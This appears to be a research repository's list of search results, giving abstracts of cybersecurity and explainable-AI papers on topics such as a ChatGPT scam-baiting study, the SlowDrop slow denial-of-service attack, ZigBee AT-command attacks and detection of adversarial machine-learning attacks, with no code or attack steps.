30 research outputs found

    Scamming the Scammers: Using ChatGPT to Reply Mails for Wasting Time and Resources

    Full text link
    The use of Artificial Intelligence (AI) to support cybersecurity operations is now a consolidated practice, e.g., to detect malicious code or configure traffic filtering policies. The recent surge of AI, generative techniques and frameworks with efficient natural language processing capabilities dramatically magnifies the number of possible applications aimed at increasing the security of the Internet. Specifically, the ability of ChatGPT to produce textual contents while mimicking realistic human interactions can be used to mitigate the plague of emails containing scams. Therefore, this paper investigates the use of AI to engage scammers in automatized and pointless communications, with the goal of wasting both their time and resources. Preliminary results showcase that ChatGPT is able to decoy scammers, thus confirming that AI is an effective tool to counteract threats delivered via mail. In addition, we highlight the multitude of implications and open research questions to be addressed in the perspective of the ubiquitous adoption of AI

    Introducing the SlowDrop Attack

    Get PDF
    In network security, Denial of Service (DoS) attacks target network systems with the aim of making them unreachable. Last generation threats are particularly dangerous because they can be carried out with very low resource consumption by the attacker. In this paper we propose SlowDrop, an attack characterized by a legitimate-like behavior and able to target different protocols and server systems. The proposed attack is the first slow DoS threat targeting Microsoft IIS, until now unexploited from other similar attacks. We properly describe the attack, analyzing its ability to target arbitrary systems on different scenarios, by including both wired and wireless connections, and comparing the proposed attack to similar threats. The obtained results show that by executing targeted attacks, SlowDrop is successful both against conventional servers and Microsoft IIS, which is closed source and required us the execution of so called \u201cnetwork level reverse engineering\u201d activities. Due to its ability to successfully target different servers on different scenarios, the attack should be considered an important achievement in the slow DoS field

    Remotely Exploiting AT Command Attacks on ZigBee Networks

    Get PDF
    Internet of Things networks represent an emerging phenomenon bringing connectivity to common sensors. Due to the limited capabilities and to the sensitive nature of the devices, security assumes a crucial and primary role. In this paper, we report an innovative and extremely dangerous threat targeting IoT networks. The attack is based on Remote AT Commands exploitation, providing a malicious user with the possibility of reconfiguring or disconnecting IoT sensors from the network. We present the proposed attack and evaluate its efficiency by executing tests on a real IoT network. Results demonstrate how the threat can be successfully executed and how it is able to focus on the targeted nodes, without affecting other nodes of the network

    Rule-based Out-Of-Distribution Detection

    Full text link
    Out-of-distribution detection is one of the most critical issue in the deployment of machine learning. The data analyst must assure that data in operation should be compliant with the training phase as well as understand if the environment has changed in a way that autonomous decisions would not be safe anymore. The method of the paper is based on eXplainable Artificial Intelligence (XAI); it takes into account different metrics to identify any resemblance between in-distribution and out of, as seen by the XAI model. The approach is non-parametric and distributional assumption free. The validation over complex scenarios (predictive maintenance, vehicle platooning, covert channels in cybersecurity) corroborates both precision in detection and evaluation of training-operation conditions proximity. Results are available via open source and open data at the following link: https://github.com/giacomo97cnr/Rule-based-ODD

    Rule-based Out-Of-Distribution Detection

    Get PDF
    Out-of-distribution detection is one of the most critical issue in the deployment of machine learning. The data analyst must assure that data in operation should be compliant with the training phase as well as understand if the environment has changed in a way that autonomous decisions would not be safe anymore. The method of the paper is based on eXplainable Artificial Intelligence (XAI); it takes into account different metrics to identify any resemblance between in-distribution and out of, as seen by the XAI model. The approach is non-parametric and distributional assumption free. The validation over complex scenarios (predictive maintenance, vehicle platooning, covert channels in cybersecurity) corroborates both precision in detection and evaluation of training-operation conditions proximity. Results are available via open source and open data at the following link: https://github.com/giacomo97cnr/Rule-based-ODD

    On the Intersection of Explainable and Reliable AI for physical fatigue prediction

    Get PDF
    In the era of Industry 4.0, the use of Artificial Intelligence (AI) is widespread in occupational settings. Since dealing with human safety, explainability and trustworthiness of AI are even more important than achieving high accuracy. eXplainable AI (XAI) is investigated in this paper to detect physical fatigue during manual material handling task simulation. Besides comparing global rule-based XAI models (LLM and DT) to black-box models (NN, SVM, XGBoost) in terms of performance, we also compare global models with local ones (LIME over XGBoost). Surprisingly, global and local approaches achieve similar conclusions, in terms of feature importance. Moreover, an expansion from local rules to global rules is designed for Anchors, by posing an appropriate optimization method (Anchors coverage is enlarged from an original low value, 11%, up to 43%). As far as trustworthiness is concerned, rule sensitivity analysis drives the identification of optimized regions in the feature space, where physical fatigue is predicted with zero statistical error. The discovery of such “non-fatigue regions” helps certifying the organizational and clinical decision making

    eXplainable and Reliable Against Adversarial Machine Learning in Data Analytics

    Get PDF
    Machine learning (ML) algorithms are nowadays widely adopted in different contexts to perform autonomous decisions and predictions. Due to the high volume of data shared in the recent years, ML algorithms are more accurate and reliable since training and testing phases are more precise. An important concept to analyze when defining ML algorithms concerns adversarial machine learning attacks. These attacks aim to create manipulated datasets to mislead ML algorithm decisions. In this work, we propose new approaches able to detect and mitigate malicious adversarial machine learning attacks against a ML system. In particular, we investigate the Carlini-Wagner (CW), the fast gradient sign method (FGSM) and the Jacobian based saliency map (JSMA) attacks. The aim of this work is to exploit detection algorithms as countermeasures to these attacks. Initially, we performed some tests by using canonical ML algorithms with a hyperparameters optimization to improve metrics. Then, we adopt original reliable AI algorithms, either based on eXplainable AI (Logic Learning Machine) or Support Vector Data Description (SVDD). The obtained results show how the classical algorithms may fail to identify an adversarial attack, while the reliable AI methodologies are more prone to correctly detect a possible adversarial machine learning attack. The evaluation of the proposed methodology was carried out in terms of good balance between FPR and FNR on real world application datasets: Domain Name System (DNS) tunneling, Vehicle Platooning and Remaining Useful Life (RUL). In addition, a statistical analysis was performed to improve the robustness of the trained models, including evaluating their performance in terms of runtime and memory consumption

    From Explainable to Reliable Artificial Intelligence

    Get PDF
    Artificial Intelligence systems are characterized by always less interactions with humans today, leading to autonomous decision-making processes. In this context, erroneous predictions can have severe consequences. As a solution, we design and develop a set of methods derived from eXplainable AI models. The aim is to define “safety regions” in the feature space where false negatives (e.g., in a mobility scenario, prediction of no collision, but collision in reality) tend to zero. We test and compare the proposed algorithms on two different datasets (physical fatigue and vehicle platooning) and achieve quite different conclusions in terms of results that strongly depend on the level of noise in the dataset rather than on the algorithms at hand

    The future of Cybersecurity in Italy: Strategic focus area

    Get PDF

    Il Futuro della Cybersecurity in Italia: Ambiti Progettuali Strategici

    Get PDF
    corecore